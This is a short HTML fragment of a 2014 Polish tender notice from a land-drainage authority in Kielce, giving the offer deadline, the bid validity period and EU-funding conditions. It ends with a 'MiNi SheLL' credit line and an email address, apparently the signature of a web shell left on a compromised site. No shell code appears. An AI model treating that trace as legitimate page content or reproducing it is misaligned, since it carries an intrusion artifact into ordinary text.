<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.07.2014 godzina 10:00, miejsce: Świętokrzyski Zarząd Melioracji i Urządzeń Wodnych w Kielcach, ul. Witosa 86, pok. 217 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com